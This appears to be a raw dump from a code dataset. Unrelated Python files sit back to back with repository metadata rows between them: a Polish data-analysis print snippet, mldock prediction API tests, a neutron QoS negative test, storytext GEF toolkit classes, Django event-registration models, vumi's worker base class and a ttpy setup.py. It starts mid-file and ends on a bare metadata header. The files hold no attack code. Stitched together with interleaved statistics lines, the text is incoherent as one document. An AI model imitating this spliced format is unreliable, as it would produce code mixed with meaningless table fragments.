# print('czesio')
# print('Analiza danych przed wypełnieniem NaN')
# print('Tabela Train\n', dataAnaysis.showTrain())
# print('\n\nshape Train\n', dataAnaysis.shapeTrain())
# print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
print('Analiza danych po wypełnieniem NaN i preparacji danych')
print('Tabela Train\n', dataAnaysis.showTrain())
print('\n\nshape Train\n', dataAnaysis.shapeTrain())
print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
# dataPreparation = DataPreparation.DataPreparation()
# print(dataPreparation.prepareTrainData().to_string())
| 26.367089
| 63
| 0.68987
| 1,311
| 0.628476
| 0
| 0
| 0
| 0
| 0
| 0
| 679
| 0.325503
|
3bc5e3ab47f6373dad23233f3b3391f39ba91b96
| 10,341
|
py
|
Python
|
tests/api/test_predict.py
|
mldock/mldock
|
314b733e4f0102321727f8b145fc276486ecad85
|
[
"Apache-2.0"
] | 2
|
2021-07-12T13:51:21.000Z
|
2021-07-19T08:40:02.000Z
|
tests/api/test_predict.py
|
mldock/mldock
|
314b733e4f0102321727f8b145fc276486ecad85
|
[
"Apache-2.0"
] | 41
|
2021-06-28T11:05:20.000Z
|
2022-03-13T13:48:50.000Z
|
tests/api/test_predict.py
|
mldock/mldock
|
314b733e4f0102321727f8b145fc276486ecad85
|
[
"Apache-2.0"
] | 1
|
2021-07-17T19:07:06.000Z
|
2021-07-17T19:07:06.000Z
|
"""Test Predict API calls"""
import io
from PIL import Image
from dataclasses import dataclass
import tempfile
from pathlib import Path
import pytest
from mock import patch
from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction
import responses
import requests
@pytest.fixture
def image_bytes():
"""reads image as bytes string"""
img = Image.open("tests/api/fixtures/eight.png", mode="r")
img_byte_arr = io.BytesIO()
img.save(img_byte_arr, format="PNG")
return img_byte_arr.getvalue()
@dataclass
class MockResponse:
status_code: int
json_data: dict = None
text: str = None
_content: bytes = None
def json(self):
return self.json_data
class TestPredictAPI:
"""
TEST ERROR STATUS_CODE!=200 SCENERIO
"""
@staticmethod
@responses.activate
def test_handle_prediction_send_json_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
)
@staticmethod
@responses.activate
def test_handle_prediction_sending_image_jpeg_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=None,
request_content_type="image/jpeg",
response_content_type="application/json",
)
@staticmethod
@responses.activate
def test_handle_prediction_sending_text_csv_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=None,
request_content_type="text/csv",
response_content_type="application/json",
)
"""
TEST SUCCESS STATUS_CODE=200 SCENERIO
"""
@staticmethod
def test_handle_prediction_send_json_success_200():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "application/json"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(data_obj, str), "Failure. Expected str json object."
@staticmethod
def test_handle_prediction_sending_image_jpeg_success_200(image_bytes):
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
_content=image_bytes, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=None,
request_content_type="image/jpeg",
response_content_type="image/jpeg",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "image/jpeg"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(
data_obj, io.BytesIO
), "Failure. Expected io.BytesIO object."
@staticmethod
def test_handle_prediction_sending_text_csv_success_200():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
text="greet,name\nhello,sam", status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=None,
request_content_type="text/csv",
response_content_type="text/csv",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "text/csv"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(data_obj, str), "Failure. Expected str json object."
"""
TEST WRITING RESPONSE TO FILE SCENERIO
"""
@staticmethod
def test_handle_prediction_send_json_success_write_response_file():
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.json")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=response_filepath,
request_content_type="application/json",
response_content_type="application/json",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
@staticmethod
def test_handle_prediction_sending_image_jpeg_success_write_response_file(
image_bytes,
):
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.png")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
_content=image_bytes, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=response_filepath,
request_content_type="image/jpeg",
response_content_type="image/jpeg",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
@staticmethod
def test_handle_prediction_sending_text_csv_success_write_response_file():
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.csv")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
text="greet,name\nhello,sam", status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=response_filepath,
request_content_type="text/csv",
response_content_type="text/csv",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
"""
TEST ADDING ADDTIONAL HEADERS
"""
@staticmethod
def test_handle_prediction_send_json_success_add_headers():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
headers={"Authentication": "bearer 12345"},
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {
"Content-Type": "application/json",
"Authentication": "bearer 12345",
},
}
_, kwargs = list(mock_execute_request.call_args)
kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
| 35.782007
| 86
| 0.579634
| 9,784
| 0.946137
| 0
| 0
| 9,718
| 0.939754
| 0
| 0
| 2,697
| 0.260806
|
3bc608810561bbe247f5ed3cfef52e4be93e7faa
| 2,081
|
py
|
Python
|
neutron/tests/tempest/api/test_qos_negative.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/tempest/api/test_qos_negative.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/tempest/api/test_qos_negative.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import constants as db_const
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest import test
from neutron.tests.tempest.api import base
LONG_NAME_NG = 'z' * (db_const.NAME_FIELD_SIZE + 1)
LONG_DESCRIPTION_NG = 'z' * (db_const.LONG_DESCRIPTION_FIELD_SIZE + 1)
LONG_TENANT_ID_NG = 'z' * (db_const.PROJECT_ID_FIELD_SIZE + 1)
class QosNegativeTestJSON(base.BaseAdminNetworkTest):
required_extensions = ['qos']
@test.attr(type='negative')
@decorators.idempotent_id('b9dce555-d3b3-11e5-950a-54ee757c77da')
def test_add_policy_with_too_long_name(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
LONG_NAME_NG, 'test policy desc1', False)
@test.attr(type='negative')
@decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee747c99db')
def test_add_policy_with_too_long_description(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
'test-policy', LONG_DESCRIPTION_NG, False)
@test.attr(type='negative')
@decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee757c77dc')
def test_add_policy_with_too_long_tenant_id(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
'test-policy', 'test policy desc1',
False, LONG_TENANT_ID_NG)
| 41.62
| 78
| 0.695819
| 1,119
| 0.537722
| 0
| 0
| 1,013
| 0.486785
| 0
| 0
| 783
| 0.376261
|
3bc6222a69419d7c3721ce7c39a656221c86ab89
| 1,105
|
py
|
Python
|
src/main/python/storytext/lib/storytext/javageftoolkit/__init__.py
|
emilybache/texttest-runner
|
2d5c42b8d37699a2cbcb8f19af7c271d6ad1024a
|
[
"MIT"
] | null | null | null |
src/main/python/storytext/lib/storytext/javageftoolkit/__init__.py
|
emilybache/texttest-runner
|
2d5c42b8d37699a2cbcb8f19af7c271d6ad1024a
|
[
"MIT"
] | null | null | null |
src/main/python/storytext/lib/storytext/javageftoolkit/__init__.py
|
emilybache/texttest-runner
|
2d5c42b8d37699a2cbcb8f19af7c271d6ad1024a
|
[
"MIT"
] | null | null | null |
""" Don't load any Eclipse stuff at global scope, needs to be importable previous to Eclipse starting """
from storytext import javarcptoolkit
import sys
class ScriptEngine(javarcptoolkit.ScriptEngine):
def createReplayer(self, universalLogging=False, **kw):
return UseCaseReplayer(self.uiMap, universalLogging, self.recorder, **kw)
def getDefaultTestscriptPluginName(self):
return "org.eclipse.swtbot.gef.testscript"
class UseCaseReplayer(javarcptoolkit.UseCaseReplayer):
def getDescriberPackage(self):
return javarcptoolkit.UseCaseReplayer.__module__
def getTestRunnerClass(self):
return TestRunner
class TestRunner(javarcptoolkit.TestRunner):
def initEclipsePackages(self):
javarcptoolkit.TestRunner.initEclipsePackages(self)
from org.eclipse.swtbot.eclipse.gef.finder import SWTGefBot
from org.eclipse.swtbot.eclipse.gef.finder.widgets import SWTBotGefViewer
from org.eclipse.draw2d import FigureCanvas
from org.eclipse.draw2d.geometry import Rectangle
from org.eclipse.gef import EditPart
| 38.103448
| 105
| 0.761086
| 943
| 0.853394
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.126697
|
3bc648d7577a48d53c343d95dc1ac69b209de7c4
| 11,380
|
py
|
Python
|
subscribe/models.py
|
jonge-democraten/dyonisos
|
bebc5b28761bd5e036e4e6e219b5474d901026c3
|
[
"MIT"
] | null | null | null |
subscribe/models.py
|
jonge-democraten/dyonisos
|
bebc5b28761bd5e036e4e6e219b5474d901026c3
|
[
"MIT"
] | 10
|
2016-10-31T21:14:06.000Z
|
2021-01-07T22:34:42.000Z
|
subscribe/models.py
|
jonge-democraten/dyonisos
|
bebc5b28761bd5e036e4e6e219b5474d901026c3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2011,2014 Floor Terra <floort@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import datetime
import logging
import traceback
from django.core.mail import EmailMessage
from django.db import models
from django.template import Context, Template
logger = logging.getLogger(__name__)
AFDELINGEN = (
("AMS", "Amsterdam"),
("AN", "Arnhem-Nijmegen"),
("BB", "Brabant"),
("FR", "Friesland"),
("GR", "Groningen"),
("LH", "Leiden-Haaglanden"),
("MS", "Limburg"),
("RD", "Rotterdam"),
("TW", "Overijssel"),
("UT", "Utrecht"),
("WN", "Wageningen"),
("INT", "Internationaal"),
)
def afdeling_text(afd):
for key, value in AFDELINGEN:
if key == afd:
return value
return None
QUESTION_TYPES = (
("INT", "Integer"),
("TXT", "Text Input"),
("AFD", "Afdeling"),
("BOOL", "Ja/Nee"),
("CHOICE", "Multiple Choice"),
("TEXT", "HTML Text"),
)
class Event(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
start_registration = models.DateTimeField()
end_registration = models.DateTimeField()
description = models.TextField()
contact_email = models.EmailField()
email_template = models.TextField(help_text="Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}")
price = models.IntegerField(help_text="Eurocenten", default=0)
max_registrations = models.IntegerField(default=0, help_text="Als groter dan 0, bepaalt maximaal aantal inschrijvingen")
class Meta:
ordering = ('-end_registration',)
def __str__(self):
return self.name
def subscribed(self):
return len(Registration.objects.filter(event=self))
def paid(self):
return len(Registration.objects.filter(event=self).filter(paid=True))
def total_paid(self):
return "\u20AC %.2f" % (sum([e.price for e in self.registrations.filter(paid=True)]) / 100.)
def form_link(self):
return "<a href=\"https://events.jongedemocraten.nl/inschrijven/%s/\">Inschrijven</a>" % (self.slug)
form_link.allow_tags = True
def all_free(self):
"""Are all event options free?"""
if self.price != 0:
return False
if len(EventOption.objects.filter(price__gt=0).filter(question__event=self)):
return False
return True
def active(self):
now = datetime.datetime.now()
if self.start_registration > now or self.end_registration < now:
return False
return True
# active.boolean = True
def price_str(self):
return "\u20AC %.2f" % (float(self.price) / 100)
def is_full(self):
if self.max_registrations <= 0:
return False
return self.registrations.count() >= self.max_registrations
is_full.boolean = True
def get_registrations_over_limit(self):
results = []
if self.max_registrations > 0:
results += self.registrations.order_by('pk')[int(self.max_registrations):]
for question in self.eventquestion_set.all():
for option in question.options.all():
results += option.get_registrations_over_limit()
return results
class EventQuestion(models.Model):
event = models.ForeignKey(Event)
name = models.CharField(max_length=64)
question_type = models.CharField(max_length=16, choices=QUESTION_TYPES)
required = models.BooleanField(default=False, help_text='Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen')
radio = models.BooleanField(default=False, help_text='Voor multiple-choice/afdeling: geen dropdown maar radio buttons')
order = models.IntegerField(default=0, help_text='Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email')
text = models.TextField(blank=True, default='', help_text='Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige HTML attributen: class, style, a.href, a.target, img.src, img.alt')
def __str__(self):
return "%s (%s)" % (self.name, self.question_type)
def form_id(self):
return "q%d" % (self.id)
def delete_event_question(self):
return '<a href="/deleteEventQuestion/?optionId=%d">Delete</a>' % (self.id)
delete_event_question.allow_tags = True
class EventOption(models.Model):
question = models.ForeignKey('EventQuestion', related_name="options")
name = models.CharField(max_length=200)
price = models.IntegerField(help_text="Eurocenten", default=0)
active = models.BooleanField(default=True)
order = models.IntegerField(default=0)
limit = models.IntegerField(default=0, help_text="Aantal beschikbare plekken (0 = geen limiet)")
def __str__(self):
if self.price < 0:
return "%s: \u20AC %.2f korting" % (self.name, float(-self.price) / 100)
if self.price > 0:
return "%s: \u20AC %.2f" % (self.name, float(self.price) / 100)
else:
return "%s" % (self.name,)
def price_str(self):
return "\u20AC %.2f" % (float(self.price) / 100)
def delete_event_option(self):
return '<a href="/deleteEventOption/?optionId=%d">Delete</a>' % (self.id)
delete_event_option.allow_tags = True
def get_related_registrations(self):
return Registration.objects.filter(answers__option=self).order_by('pk')
def num_registrations(self):
registrations = self.get_related_registrations()
return registrations.count()
def is_full(self):
if self.limit <= 0:
return False
return self.num_registrations() >= self.limit
is_full.boolean = True
def limit_str(self):
if self.limit <= 0:
return "-"
return "{}/{}".format(self.num_registrations(), self.limit)
limit_str.short_description = "Limit usage"
def get_registrations_over_limit(self):
if self.limit <= 0:
return []
registrations = self.get_related_registrations()
return registrations[int(self.limit):]
def limit_reached(self):
return self.is_full()
limit_reached.boolean = True
class Registration(models.Model):
registration_date = models.DateTimeField(auto_now_add=True)
first_name = models.CharField(max_length=64)
last_name = models.CharField(max_length=64)
email = models.EmailField(blank=True)
event = models.ForeignKey(Event, related_name='registrations')
price = models.IntegerField(default=0)
paid = models.BooleanField(default=False)
status = models.CharField(max_length=64, default="", blank=True)
trxid = models.CharField(max_length=128, default="", blank=True)
def calculate_price(self):
self.price = self.event.price + sum([answer.option.price for answer in self.answers.exclude(option=None)])
def get_options_text(self):
results = []
added_default_fields = False
answers = {a.question: a.get_answer() for a in self.answers.all()}
for question in self.event.eventquestion_set.order_by('order'):
if question.order >= 0 and not added_default_fields:
results += ["Voornaam: {}".format(self.first_name)]
results += ["Achternaam: {}".format(self.last_name)]
results += ["Email: {}".format(self.email)]
added_default_fields = True
if question in answers:
results += ["{}: {}".format(question.name, answers[question])]
if not added_default_fields:
results += ["Voornaam: {}".format(self.first_name)]
results += ["Achternaam: {}".format(self.last_name)]
results += ["Email: {}".format(self.email)]
return '\n'.join(results)
def __str__(self):
return "%s %s - %s - %s" % (self.first_name, self.last_name, self.event, str(self.price))
def gen_subscription_id(self):
num_id = str(self.id)
safe = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")
return num_id + "x" + filter(lambda c: c in safe, self.get_options_name())[:15 - len(num_id)]
def send_confirmation_email(self):
t = Template(self.event.email_template)
c = Context({
"voornaam": self.first_name,
"achternaam": self.last_name,
"inschrijf_opties": self.get_options_text(),
})
rendered_mail = t.render(c)
email = EmailMessage(
subject="Inschrijfbevestiging: %s" % (self.event.name),
body=rendered_mail,
from_email=self.event.contact_email,
to=[self.email],
)
try:
email.send()
except:
logger.error("Could not send welcome mail to %s" % (self.email))
logger.error(traceback.format_exc())
raise
return rendered_mail
class Answer(models.Model):
# This should maybe be a "through" model
registration = models.ForeignKey(Registration, related_name='answers')
question = models.ForeignKey(EventQuestion)
int_field = models.IntegerField(default=0, null=True)
txt_field = models.CharField(max_length=256, blank=True)
bool_field = models.BooleanField(default=False)
option = models.ForeignKey(EventOption, default=None, null=True, blank=True)
def __str__(self):
return "%s - %s" % (self.question, self.get_answer())
def set_answer(self, ans):
if self.question.question_type == "INT":
self.int_field = ans
elif self.question.question_type == "TXT":
self.txt_field = ans
elif self.question.question_type == "AFD":
self.txt_field = ans
elif self.question.question_type == "BOOL":
self.bool_field = ans
if self.bool_field and len(self.question.options.all()):
self.option = self.question.options.all()[0]
else:
self.option = None
elif self.question.question_type == "CHOICE":
self.option = ans
def get_answer(self):
if self.question.question_type == "INT":
return self.int_field
elif self.question.question_type == "TXT":
return self.txt_field
elif self.question.question_type == "AFD":
return afdeling_text(self.txt_field)
elif self.question.question_type == "BOOL":
if self.option is not None:
return self.option
else:
return self.bool_field and 'Ja' or 'Nee'
elif self.question.question_type == "CHOICE":
return self.option
| 37.682119
| 228
| 0.644991
| 9,714
| 0.853603
| 0
| 0
| 0
| 0
| 0
| 0
| 2,536
| 0.222847
|
3bc7d40a1ff3f95ca6bbd675bada6d5806be3718
| 7,661
|
py
|
Python
|
vumi/worker.py
|
hnec-vr/vumi
|
b9c1100176a46774b502d5a0db225930a2d298c7
|
[
"BSD-3-Clause"
] | 1
|
2016-07-27T17:13:32.000Z
|
2016-07-27T17:13:32.000Z
|
vumi/worker.py
|
TouK/vumi
|
6d250c7039fa1d82b01c5b68722aa8a6a94580b2
|
[
"BSD-3-Clause"
] | null | null | null |
vumi/worker.py
|
TouK/vumi
|
6d250c7039fa1d82b01c5b68722aa8a6a94580b2
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- test-case-name: vumi.tests.test_worker -*-
"""Basic tools for workers that handle TransportMessages."""
import time
import os
import socket
from twisted.internet.defer import (
inlineCallbacks, succeed, maybeDeferred, gatherResults)
from twisted.python import log
from vumi.service import Worker
from vumi.middleware import setup_middlewares_from_config
from vumi.connectors import ReceiveInboundConnector, ReceiveOutboundConnector
from vumi.config import Config, ConfigInt
from vumi.errors import DuplicateConnectorError
from vumi.utils import generate_worker_id
from vumi.blinkenlights.heartbeat import (HeartBeatPublisher,
HeartBeatMessage)
def then_call(d, func, *args, **kw):
return d.addCallback(lambda r: func(*args, **kw))
class BaseConfig(Config):
"""Base config definition for workers.
You should subclass this and add worker-specific fields.
"""
amqp_prefetch_count = ConfigInt(
"The number of messages fetched concurrently from each AMQP queue"
" by each worker instance.",
default=20, static=True)
class BaseWorker(Worker):
"""Base class for a message processing worker.
This contains common functionality used by application, transport and
dispatcher workers. It should be subclassed by workers that need to
manage their own connectors.
"""
CONFIG_CLASS = BaseConfig
def __init__(self, options, config=None):
super(BaseWorker, self).__init__(options, config=config)
self.connectors = {}
self.middlewares = []
self._static_config = self.CONFIG_CLASS(self.config, static=True)
self._hb_pub = None
self._worker_id = None
def startWorker(self):
log.msg('Starting a %s worker with config: %s'
% (self.__class__.__name__, self.config))
d = maybeDeferred(self._validate_config)
then_call(d, self.setup_heartbeat)
then_call(d, self.setup_middleware)
then_call(d, self.setup_connectors)
then_call(d, self.setup_worker)
return d
def stopWorker(self):
log.msg('Stopping a %s worker.' % (self.__class__.__name__,))
d = succeed(None)
then_call(d, self.teardown_worker)
then_call(d, self.teardown_connectors)
then_call(d, self.teardown_middleware)
then_call(d, self.teardown_heartbeat)
return d
def setup_connectors(self):
raise NotImplementedError()
@inlineCallbacks
def setup_heartbeat(self):
# Disable heartbeats if worker_name is not set. We're
# currently using it as the primary identifier for a worker
if 'worker_name' in self.config:
self._worker_name = self.config.get("worker_name")
self._system_id = self.options.get("system-id", "global")
self._worker_id = generate_worker_id(self._system_id,
self._worker_name)
log.msg("Starting HeartBeat publisher with worker_name=%s"
% self._worker_name)
self._hb_pub = yield self.start_publisher(HeartBeatPublisher,
self._gen_heartbeat_attrs)
else:
log.msg("HeartBeat publisher disabled. No worker_id "
"field found in config.")
def teardown_heartbeat(self):
if self._hb_pub is not None:
self._hb_pub.stop()
self._hb_pub = None
def _gen_heartbeat_attrs(self):
# worker_name is guaranteed to be set here, otherwise this func would
# not have been called
attrs = {
'version': HeartBeatMessage.VERSION_20130319,
'worker_id': self._worker_id,
'system_id': self._system_id,
'worker_name': self._worker_name,
'hostname': socket.gethostname(),
'timestamp': time.time(),
'pid': os.getpid(),
}
attrs.update(self.custom_heartbeat_attrs())
return attrs
def custom_heartbeat_attrs(self):
"""Worker subclasses can override this to add custom attributes"""
return {}
def teardown_connectors(self):
d = succeed(None)
for connector_name in self.connectors.keys():
then_call(d, self.teardown_connector, connector_name)
return d
def setup_worker(self):
raise NotImplementedError()
def teardown_worker(self):
raise NotImplementedError()
def setup_middleware(self):
"""Create middlewares from config."""
d = setup_middlewares_from_config(self, self.config)
d.addCallback(self.middlewares.extend)
return d
def teardown_middleware(self):
"""Teardown middlewares."""
d = succeed(None)
for mw in reversed(self.middlewares):
then_call(d, mw.teardown_middleware)
return d
def get_static_config(self):
"""Return static (message independent) configuration."""
return self._static_config
def get_config(self, msg, ctxt=None):
"""This should return a message and context specific config object.
It deliberately returns a deferred even when this isn't strictly
necessary to ensure that workers will continue to work when per-message
configuration needs to be fetched from elsewhere.
"""
return succeed(self.CONFIG_CLASS(self.config))
def _validate_config(self):
"""Once subclasses call `super().validate_config` properly,
this method can be removed.
"""
# TODO: remove this once all uses of validate_config have been fixed.
self.validate_config()
def validate_config(self):
"""
Application-specific config validation happens in here.
Subclasses may override this method to perform extra config
validation.
"""
# TODO: deprecate this in favour of a similar method on
# config classes.
pass
def setup_connector(self, connector_cls, connector_name, middleware=False):
if connector_name in self.connectors:
raise DuplicateConnectorError("Attempt to add duplicate connector"
" with name %r" % (connector_name,))
prefetch_count = self.get_static_config().amqp_prefetch_count
middlewares = self.middlewares if middleware else None
connector = connector_cls(self, connector_name,
prefetch_count=prefetch_count,
middlewares=middlewares)
self.connectors[connector_name] = connector
d = connector.setup()
d.addCallback(lambda r: connector)
return d
def teardown_connector(self, connector_name):
connector = self.connectors.pop(connector_name)
d = connector.teardown()
d.addCallback(lambda r: connector)
return d
def setup_ri_connector(self, connector_name, middleware=True):
return self.setup_connector(ReceiveInboundConnector, connector_name,
middleware=middleware)
def setup_ro_connector(self, connector_name, middleware=True):
return self.setup_connector(ReceiveOutboundConnector, connector_name,
middleware=middleware)
def pause_connectors(self):
return gatherResults([
connector.pause() for connector in self.connectors.itervalues()])
def unpause_connectors(self):
for connector in self.connectors.itervalues():
connector.unpause()
| 35.967136
| 79
| 0.645477
| 6,862
| 0.895706
| 851
| 0.111082
| 872
| 0.113823
| 0
| 0
| 1,997
| 0.260671
|
3bc950ff5c221db7b60343065a9a70cf058a7e1a
| 1,204
|
py
|
Python
|
tt/ksl/setup.py
|
aiboyko/ttpy
|
8fda9d29e27e4f9f68ffba5cc1e16b3020eb131f
|
[
"MIT"
] | 2
|
2021-04-02T17:42:03.000Z
|
2021-11-17T11:30:42.000Z
|
tt/ksl/setup.py
|
qbit-/ttpy
|
596b1c9fe6ce5f0ba66d801ac88a1147204cec2f
|
[
"MIT"
] | null | null | null |
tt/ksl/setup.py
|
qbit-/ttpy
|
596b1c9fe6ce5f0ba66d801ac88a1147204cec2f
|
[
"MIT"
] | 1
|
2021-01-10T07:02:09.000Z
|
2021-01-10T07:02:09.000Z
|
# setup.py
# This script will build the main subpackages
# See LICENSE for details
from __future__ import print_function, absolute_import
from numpy.distutils.misc_util import Configuration
from os.path import join
TTFORT_DIR = '../tt-fort'
EXPM_DIR = '../tt-fort/expm'
EXPOKIT_SRC = [
'explib.f90',
'normest.f90',
'expokit.f',
'dlacn1.f',
'dlapst.f',
'dlarpc.f',
'zlacn1.f',
]
TTKSL_SRC = [
'ttals.f90',
'tt_ksl.f90',
'tt_diag_ksl.f90'
]
def configuration(parent_package='', top_path=None):
expokit_src = [join(EXPM_DIR, x) for x in EXPOKIT_SRC]
ttksl_src = [join(TTFORT_DIR, x) for x in TTKSL_SRC]
ttksl_src.append('tt_ksl.pyf')
config = Configuration('ksl', parent_package, top_path)
config.add_library(
'expokit',
sources=expokit_src,
)
config.add_extension(
'dyn_tt',
sources=ttksl_src,
depends=[
'print_lib',
'expokit',
'mytt',
],
libraries=[
'print_lib',
'expokit',
'mytt',
],
)
return config
if __name__ == '__main__':
print('This is the wrong setup.py to run')
| 19.737705
| 59
| 0.58887
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 364
| 0.302326
|
3bcd4cf0614ab6f7c88bcffd7170ce176a5a3489
| 305
|
py
|
Python
|
tests/text_processors/test_json_text_processor.py
|
lyteloli/NekoGram
|
f077471000b40a74e0eb4e98dfb570b5e34d23ab
|
[
"MIT"
] | 8
|
2020-08-21T07:43:52.000Z
|
2022-01-27T06:48:01.000Z
|
tests/text_processors/test_json_text_processor.py
|
lyteloli/NekoGram
|
f077471000b40a74e0eb4e98dfb570b5e34d23ab
|
[
"MIT"
] | null | null | null |
tests/text_processors/test_json_text_processor.py
|
lyteloli/NekoGram
|
f077471000b40a74e0eb4e98dfb570b5e34d23ab
|
[
"MIT"
] | 1
|
2022-01-27T06:48:02.000Z
|
2022-01-27T06:48:02.000Z
|
from NekoGram import Neko, Bot
import json
def test_json_text_processor():
neko = Neko(bot=Bot(token='0:0', validate_token=False), validate_text_names=False)
raw_json = '{"x": {"text": "hello"} }'
neko.add_texts(texts=raw_json, lang='en')
assert neko.texts['en'] == json.loads(raw_json)
| 30.5
| 86
| 0.688525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.131148
|
3bcdd1ca315307c12c5399ab4a8df2ed64ad6708
| 7,960
|
py
|
Python
|
itdagene/app/meetings/migrations/0001_initial.py
|
itdagene-ntnu/itdagene
|
b972cd3d803debccebbc33641397a39834b8d69a
|
[
"MIT"
] | 9
|
2018-10-17T20:58:09.000Z
|
2021-12-16T16:16:45.000Z
|
